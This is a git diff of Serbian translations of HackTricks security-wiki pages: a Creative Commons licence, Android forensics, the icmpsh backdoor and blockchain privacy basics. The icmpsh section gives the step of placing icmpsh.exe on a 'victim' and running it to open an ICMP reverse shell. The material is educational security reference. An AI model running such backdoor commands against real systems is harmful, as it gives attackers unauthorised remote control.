za vršenje Licenciranih prava, bilo direktno ili putem kolektivnog društva u okviru bilo koje dobrovoljne ili obavezne šeme licenciranja. U svim drugim slučajevima, Davaoc licence izričito zadržava pravo da naplati takvu naknadu, uključujući kada se Licencirani materijal koristi u druge svrhe osim nekomercijalnih. +3. U meri u kojoj je moguće, Davaoc licence odriče se prava da naplati naknadu od Vas za vršenje Licenciranih prava, bilo direktno ili putem udruženja za naplatu naknada u okviru bilo kog dobrovoljnog ili obaveznog sistema licenciranja. U svim ostalim slučajevima, Davaoc licence izričito zadržava pravo da naplati takve naknade, uključujući kada se Licencirani materijal koristi za nekomercijalne svrhe. -## Sekcija 3 - Uslovi licence. +## Sekcija 3 – Uslovi licence. Vaše vršenje Licenciranih prava izričito je podložno sledećim uslovima. -a. ___Pripisivanje.___ +a. ___Atribucija.___ -1. Ako delite Licencirani materijal (uključujući u izmenjenom obliku), morate: +1. Ako Delite Licencirani materijal (uključujući u modifikovanom obliku), morate: -A. zadržati sledeće, ako je dostavljeno od strane Davaoca licence uz Licencirani materijal: +A. zadržati sledeće ako je dostavljeno od strane Davaoca licence uz Licencirani materijal: -i. identifikaciju autora Licenciranog materijala i svih drugih koji su određeni da prime priznanje, na bilo koji razuman način koji je zatražen od strane Davaoca licence (uključujući pseudonim ako je određen); +i. identifikaciju autora Licenciranog materijala i svih drugih ovlašćenih da prime atribuciju, na bilo koji razuman način koji zatraži Davaoc licence (uključujući pod pseudonimom ako je određeno); ii. obaveštenje o autorskim pravima; @@ -91,63 +111,84 @@ iii. obaveštenje koje se odnosi na ovu Javnu licencu; iv. obaveštenje koje se odnosi na odricanje od garancija; -v. URI ili hiperlink do Licenciranog materijala, koliko je razumno izvodljivo; +v. URI ili hiperlink do Licenciranog materijala koliko je razumno izvodljivo; -B. naznačiti ako ste izmenili Licencirani materijal i zadržati naznaku svih prethodnih izmena; i +B. naznačiti da li ste modifikovali Licencirani materijal i zadržati naznaku bilo kakvih prethodnih modifikacija; i -C. naznačiti da je Licencirani materijal licenciran prema ovoj Javnoj licenci i uključiti tekst ili URI ili hiperlink do ove Javne licence. +C. naznačiti da je Licencirani materijal licenciran pod ovom Javnom licencom, i uključiti tekst, ili URI ili hiperlink do, ove Javne licence. -2. Možete zadovoljiti uslove iz Odeljka 3(a)(1) na bilo koji razuman način zasnovan na mediju, sredstvima i kontekstu u kojem delite Licencirani materijal. Na primer, može biti razumno zadovoljiti uslove pružanjem URI-ja ili hiperlinka do resursa koji sadrži potrebne informacije. +2. Možete ispuniti uslove u Sekciji 3(a)(1) na bilo koji razuman način zasnovan na mediju, sredstvima i kontekstu u kojem Delite Licencirani materijal. Na primer, može biti razumno ispuniti uslove pružanjem URI-ja ili hiperlinka do resursa koji sadrži potrebne informacije. -3. Ako to zatraži Davaoc licence, morate ukloniti bilo koje informacije koje su potrebne prema Odeljku 3(a)(1)(A), koliko je razumno izvodljivo. +3. Ako zatraženo od strane Davaoca licence, morate ukloniti bilo koje od informacija potrebnih prema Sekciji 3(a)(1)(A) koliko je razumno izvodljivo. -4. Ako delite Prilagođeni materijal koji ste proizveli, Licenca Adaptera koju primenjujete ne sme sprečiti primaoce Prilagođenog materijala da se pridržavaju ove Javne licence. +4. Ako Delite Prilagođeni materijal koji proizvedete, Licenca Adaptera koju primenjujete ne sme sprečiti primaoca Prilagođenog materijala da se pridržava ove Javne licence. -## Sekcija 4 - Sui Generis prava baze podataka. +## Sekcija 4 – Sui Generis prava baze podataka. -Ako Licencirana prava uključuju Sui Generis prava baze podataka koja se odnose na Vašu upotrebu Licenciranog materijala: +Gde Licencirana prava uključuju Sui Generis prava baze podataka koja se odnose na Vašu upotrebu Licenciranog materijala: -a. radi izbegavanja nedoumica, Odeljak 2(a)(1) Vam dodeljuje pravo da izvučete, ponovo upotrebite, reprodukujete i delite celokupan ili značajan deo sadržaja baze podataka samo u nekomercijalne svrhe; +a. radi izbegavanja nedoumica, Sekcija 2(a)(1) Vam dodeljuje pravo da izvučete, ponovo koristite, reprodukujete i Delite sve ili značajan deo sadržaja baze podataka isključivo u nekomercijalne svrhe; -b. ako uključite celokupan ili značajan deo sadržaja baze podataka u bazu podataka u kojoj imate Sui Generis prava baze podataka, tada je baza podataka u kojoj imate Sui Generis prava baze podataka (ali ne i njeni pojedinačni sadržaji) Prilagođeni materijal; i +b. ako uključite sve ili značajan deo sadržaja baze podataka u bazu podataka u kojoj imate Sui Generis prava baze podataka, tada je baza podataka u kojoj imate Sui Generis prava baze podataka (ali ne njeni pojedinačni sadržaji) Prilagođeni materijal; i -c. morate se pridržavati uslova iz Odeljka 3(a) ako delite celokupan ili značajan deo sadržaja baze podataka. +c. Morate se pridržavati uslova u Sekciji 3(a) ako Delite sve ili značajan deo sadržaja baze podataka. -Radi izbegavanja nedoumica, ovaj Odeljak 4 dopunjuje i ne zamenjuje Vaše obaveze prema ovoj Javnoj licenci kada Licencirana prava uključuju druga autorska prava i slična prava. +Radi izbegavanja nedoumica, ova Sekcija 4 dopunjuje, a ne zamenjuje Vaše obaveze prema ovoj Javnoj licenci gde Licencirana prava uključuju druga autorska i srodna prava. -## Sekcija 5 - Odricanje od garancija i ograničenje odgovornosti. +## Sekcija 5 – Odricanje od garancija i ograničenje odgovornosti. -a. __Osim ako Davaoc licence posebno preuzme obavezu, u najvećoj mogućoj meri, Davaoc licence nudi Licencirani materijal "kakav jeste" i "kako je dostupan", i ne daje nikakve izjave ili garancije bilo koje vrste u vezi sa Licenciranim materijalom, bilo da su izričite, implicirane, zakons -## Sekcija 7 - Ostali uslovi i odredbe. +a. __Osim ako Davaoc licence posebno preuzme, u meri u kojoj je moguće, Davaoc licence nudi Licencirani materijal u stanju u kojem se nalazi i dostupan je, i ne daje nikakve izjave ili garancije bilo koje vrste u vezi sa Licenciranim materijalom, bilo da su eksplicitne, implicitne, zakonske ili druge. To uključuje, bez ograničenja, garancije naslova, trgovinske sposobnosti, odgovarajućnosti za određenu svrhu, nekršenja, odsustva skrivenih ili drugih grešaka, tačnosti, ili prisustva ili odsustva grešaka, bilo da su poznate ili otkrivene. Gde odricanja od garancija nisu dozvoljena u celini ili delimično, ovo odricanje se možda neće primenjivati na Vas.__ -a. Izdavalac neće biti obavezan bilo kakvim dodatnim ili drugačijim uslovima ili odredbama koje su vam saopštene, osim ako izričito nije dogovoreno. +b. __U meri u kojoj je moguće, u nijednom slučaju Davaoc licence neće biti odgovoran prema Vama po bilo kojoj pravnoj teoriji (uključujući, bez ograničenja, nemar) ili na drugi način za bilo kakve direktni, posebne, indirektne, slučajne, posledične, kaznene, primerne ili druge gubitke, troškove, rashode ili štetu proizašlu iz ove Javne licence ili upotrebe Licenciranog materijala, čak i ako je Davaoc licence obavešten o mogućnosti takvih gubitaka, troškova, rashoda ili štete. Gde ograničenje odgovornosti nije dozvoljeno u celini ili delimično, ovo ograničenje se možda neće primenjivati na Vas.__ -b. Sve aranžmane, razumijevanja ili sporazume u vezi sa licenciranim materijalom koji nisu navedeni ovdje, treba smatrati odvojenim i nezavisnim od uslova ove javne licence. +c. Odricanje od garancija i ograničenje odgovornosti navedeno gore će se tumačiti na način koji, u meri u kojoj je moguće, najbliže odgovara apsolutnom odricanju i odricanju od svake odgovornosti. + +## Sekcija 6 – Rok i raskid. + +a. Ova Javna licenca važi za trajanje autorskih i srodnih prava ovde licenciranih. Međutim, ako ne ispunite ovu Javnu licencu, tada Vaša prava prema ovoj Javnoj licenci automatski prestaju. + +b. Gde je Vaše pravo da koristite Licencirani materijal prestalo prema Sekciji 6(a), ono se ponovo uspostavlja: + +1. automatski od datuma kada se prekršaj otkloni, pod uslovom da je otklonjen u roku od 30 dana od Vašeg otkrića prekršaja; ili + +2. na izričit zahtev Davaoca licence. + +Radi izbegavanja nedoumica, ova Sekcija 6(b) ne utiče na bilo koje pravo koje Davaoc licence može imati da traži pravna sredstva za Vaše kršenje ove Javne licence. + +c. Radi izbegavanja nedoumica, Davaoc licence takođe može ponuditi Licencirani materijal pod posebnim uslovima ili prekinuti distribuciju Licenciranog materijala u bilo koje vreme; međutim, to neće okončati ovu Javnu licencu. + +d. Sekcije 1, 5, 6, 7 i 8 opstaju nakon prestanka ove Javne licence. +## Sekcija 7 - Ostali Uslovi i Odredbe. + +a. Davaoc licence neće biti obavezan bilo kojim dodatnim ili različitim uslovima ili odredbama koje ste Vi saopštili, osim ako nije izričito dogovoreno. + +b. Sve aranžmane, razumevanja ili sporazume u vezi sa Licenciranim materijalom koji nisu navedeni ovde smatraju se odvojenim i nezavisnim od uslova ove Javne licence. ## Sekcija 8 - Tumačenje. -a. Radi izbjegavanja nedoumica, ova javna licenca ne smanjuje, ne ograničava, ne restriktuje niti nameće uslove za bilo koju upotrebu licenciranog materijala koja bi se mogla zakonito obaviti bez dozvole prema ovoj javnoj licenci. +a. Radi izbegavanja nedoumica, ova Javna licenca ne smanjuje, ne ograničava, ne restriktuje niti ne nameće uslove na bilo koju upotrebu Licenciranog materijala koja bi se zakonito mogla obaviti bez dozvole prema ovoj Javnoj licenci. -b. U najvećoj mogućoj mjeri, ako se utvrdi da je odredba ove javne licence neizvršiva, automatski će biti izmijenjena u minimalnoj mjeri potrebnoj da bi postala izvršiva. Ako se odredba ne može izmijeniti, bit će izuzeta iz ove javne licence, pri čemu se neće utjecati na izvršnost preostalih uslova i odredbi. +b. U meri u kojoj je moguće, ako se odredba ove Javne licence smatra neizvršnom, automatski će biti reformisana do minimalne mere potrebne da bi postala izvršna. Ako odredba ne može biti reformisana, biće odvojena od ove Javne licence bez uticaja na izvršnost preostalih uslova i odredbi. -c. Nijedan uslov ove javne licence neće biti odstupljen, niti će se pristati na nepoštivanje, osim ako izričito nije dogovoreno od strane izdavaoca. +c. Nijedan uslov ove Javne licence neće biti odstupljen i nijedno nepoštovanje neće biti odobreno osim ako nije izričito dogovoreno od strane Davaoca licence. -d. Ništa u ovoj javnoj licenci ne predstavlja ili se ne može tumačiti kao ograničenje ili odricanje od bilo kakvih privilegija i imuniteta koji se odnose na izdavaoca ili vas, uključujući pravne postupke bilo koje nadležnosti ili vlasti. +d. Ništa u ovoj Javnoj licenci ne predstavlja niti se može tumačiti kao ograničenje ili odricanje od bilo kakvih privilegija i imuniteta koji se odnose na Davaoca licence ili Vas, uključujući pravne postupke bilo koje nadležnosti ili vlasti. ``` Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). ``` +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/android-forensics.md b/android-forensics.md index ddcc719ba..0ec47a84d 100644 --- a/android-forensics.md +++ b/android-forensics.md @@ -1,51 +1,53 @@ -# Android forenzika +# Android Forenzika + +{% hint style="success" %} +Naučite i vežbajte AWS Hakovanje:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP Hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Zaključan uređaj -Da biste započeli sa izvlačenjem podataka sa Android uređaja, on mora biti otključan. Ako je zaključan, možete: +Da biste počeli sa izvlačenjem podataka sa Android uređaja, mora biti otključan. Ako je zaključan, možete: -* Proverite da li je uređaj ima aktiviranu USB debagovanje. -* Proverite mogući [napad otiskom prsta](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) +* Proverite da li je na uređaju aktivirano debagovanje putem USB-a. +* Proverite mogući [napad na otiske prstiju](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) * Pokušajte sa [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) ## Akvizicija podataka -Napravite [android rezervnu kopiju koristeći adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) i izvucite je koristeći [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` +Napravite [android rezervnu kopiju korišćenjem adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) i izvucite je koristeći [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` ### Ako imate root pristup ili fizičku vezu sa JTAG interfejsom -* `cat /proc/partitions` (pretražite putanju do fleš memorije, generalno prvi unos je _mmcblk0_ i odgovara celoj fleš memoriji). +* `cat /proc/partitions` (potražite putanju do fleš memorije, obično je prva stavka _mmcblk0_ i odgovara celoj fleš memoriji). * `df /data` (Otkrijte veličinu bloka sistema). -* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (izvršite sa informacijama prikupljenim iz veličine bloka). +* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (izvršite sa informacijama prikupljenim o veličini bloka). ### Memorija -Koristite Linux Memory Extractor (LiME) za izvlačenje informacija o RAM-u. To je kernel ekstenzija koja se treba učitati putem adb-a. +Koristite Linux Memory Extractor (LiME) da izvučete informacije o RAM-u. To je kernel ekstenzija koja bi trebalo da se učita putem adb. + +{% hint style="success" %} +Naučite i vežbajte AWS Hakovanje:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP Hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md index 9388503c9..c611302df 100644 --- a/backdoors/icmpsh.md +++ b/backdoors/icmpsh.md @@ -1,17 +1,17 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
- +{% endhint %} Preuzmite backdoor sa: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) @@ -31,20 +31,21 @@ read IP ``` # **Strana žrtve** -Otpremite **icmpsh.exe** na žrtvu i izvršite: +Postavite **icmpsh.exe** na žrtvu i izvršite: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +Učite i vežbajte AWS hakovanje: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index fe996b460..f8d8a5f1e 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,184 +1,185 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Pogledajte [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Osnovni Koncepti -- **Pametni ugovori** se definišu kao programi koji se izvršavaju na blockchain-u kada se ispune određeni uslovi, automatizujući izvršenje sporazuma bez posrednika. -- **Decentralizovane aplikacije (dApps)** se grade na pametnim ugovorima, sa korisničkim interfejsom koji je prijateljski nastrojen i transparentnim, proverljivim backend-om. -- **Tokeni & Kriptovalute** se razlikuju gde kriptovalute služe kao digitalni novac, dok tokeni predstavljaju vrednost ili vlasništvo u određenim kontekstima. -- **Utility Tokeni** omogućavaju pristup uslugama, a **Security Tokeni** označavaju vlasništvo nad imovinom. -- **DeFi** označava Decentralizovanu Finansiju, koja nudi finansijske usluge bez centralnih autoriteta. -- **DEX** i **DAO** se odnose na Decentralizovane Platforme za Razmenu i Decentralizovane Autonomne Organizacije, redom. +- **Pametni Ugovori** su programi koji se izvršavaju na blockchain-u kada se ispune određeni uslovi, automatizujući izvršenje sporazuma bez posrednika. +- **Decentralizovane Aplikacije (dApps)** se grade na pametnim ugovorima, sa korisnički prijateljskim front-endom i transparentnim, revizibilnim back-endom. +- **Tokeni & Kovanice** se razlikuju gde kovanice služe kao digitalni novac, dok tokeni predstavljaju vrednost ili vlasništvo u specifičnim kontekstima. +- **Tokeni za Upotrebu** omogućavaju pristup uslugama, a **Tokeni za Bezbednost** označavaju vlasništvo nad imovinom. +- **DeFi** označava Decentralizovanu Finansiju, nudeći finansijske usluge bez centralnih autoriteta. +- **DEX** i **DAOs** se odnose na Decentralizovane Platforme za Razmenu i Decentralizovane Autonomne Organizacije, redom. -## Mekanizmi Konsenzusa +## Mehanizmi Konsenzusa -Mekanizmi konsenzusa obezbeđuju sigurnu i dogovorenu validaciju transakcija na blockchain-u: -- **Proof of Work (PoW)** se oslanja na računarsku snagu za verifikaciju transakcija. -- **Proof of Stake (PoS)** zahteva od validatora da poseduju određenu količinu tokena, smanjujući potrošnju energije u poređenju sa PoW-om. +Mehanizmi konsenzusa osiguravaju sigurnu i dogovorenu validaciju transakcija na blockchain-u: +- **Dokaz o Radu (PoW)** se oslanja na računarsku snagu za verifikaciju transakcija. +- **Dokaz o Deonici (PoS)** zahteva od validatara da drže određenu količinu tokena, smanjujući potrošnju energije u poređenju sa PoW-om. -## Osnove Bitkoina +## Bitcoin Osnove ### Transakcije -Bitkoin transakcije uključuju prenos sredstava između adresa. Transakcije se validiraju putem digitalnih potpisa, obezbeđujući da samo vlasnik privatnog ključa može pokrenuti prenose. +Bitcoin transakcije uključuju prenos sredstava između adresa. Transakcije se validiraju putem digitalnih potpisa, osiguravajući da samo vlasnik privatnog ključa može pokrenuti transfere. #### Ključni Elementi: -- **Multisignature Transakcije** zahtevaju više potpisa za autorizaciju transakcije. -- Transakcije se sastoje od **ulaza** (izvor sredstava), **izlaza** (odredište), **naknade** (plaćene rudarima) i **skripti** (pravila transakcije). +- **Transakcije sa Više Potpisa** zahtevaju više potpisa za autorizaciju transakcije. +- Transakcije se sastoje od **ulaza** (izvor sredstava), **izlaza** (odredište), **naknada** (plaćene rudarima) i **skripti** (pravila transakcije). -### Lightning Mreža +### Mreža Munje -Cilj je poboljšati skalabilnost Bitkoina omogućavajući više transakcija unutar kanala, pri čemu se samo konačno stanje emituje na blockchain. +Cilj je unaprediti skalabilnost Bitcoina omogućavajući višestruke transakcije unutar kanala, emitujući samo konačno stanje na blockchain. -## Problemi Privatnosti Bitkoina +## Bitcoin Problemi Privatnosti -Napadi na privatnost, poput **Zajedničkog Vlasništva Ulaza** i **Detekcije Adrese za Promenu UTXO**, iskorišćavaju obrasce transakcija. Strategije poput **Miksera** i **CoinJoin-a** poboljšavaju anonimnost tako što zamagljuju veze između transakcija između korisnika. +Napadi na privatnost, poput **Zajedničkog Vlasništva Ulaza** i **Detekcije Adrese Promene UTXO**, iskorišćavaju obrasce transakcija. Strategije poput **Miksera** i **CoinJoin-a** poboljšavaju anonimnost zamagljujući veze transakcija između korisnika. -## Anonimno Nabavljanje Bitkoina +## Anonimno Sticanje Bitcoina -Metode uključuju gotovinske razmene, rudarenje i korišćenje miksera. **CoinJoin** meša više transakcija kako bi otežao praćenje, dok **PayJoin** prikriva CoinJoin kao redovne transakcije za povećanu privatnost. +Metode uključuju trgovinu gotovinom, rudarenje i korišćenje miksera. **CoinJoin** meša više transakcija kako bi otežao praćenje, dok **PayJoin** prikriva CoinJoin-ove kao redovne transakcije za veću privatnost. -# Napadi na Privatnost Bitkoina +# Napadi na Privatnost Bitcoina -# Rezime Napada na Privatnost Bitkoina +# Rezime Napada na Privatnost Bitcoina -U svetu Bitkoina, privatnost transakcija i anonimnost korisnika često su predmet zabrinutosti. Evo pojednostavljenog pregleda nekoliko uobičajenih metoda putem kojih napadači mogu ugroziti privatnost Bitkoina. +U svetu Bitcoina, 